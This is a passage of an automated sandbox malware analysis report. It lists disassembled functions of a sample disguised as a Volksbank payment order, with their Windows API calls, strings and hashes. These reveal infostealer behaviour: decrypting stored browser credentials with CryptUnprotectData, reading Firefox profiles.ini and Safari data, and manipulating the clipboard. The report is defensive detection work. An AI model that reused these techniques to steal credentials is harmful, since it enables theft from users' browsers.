                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3604893535-0
                                                                                                                                                                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1213725291-0
                                                                                                                                                                                                                                          • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7693DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                                          • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                                          Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                          • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                                            • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2633007058-0
                                                                                                                                                                                                                                          • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                                                          • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                                                                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                                          • API String ID: 2929817778-1134094380
                                                                                                                                                                                                                                          • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                                          • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                                          • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                                          • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                                                                                          • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
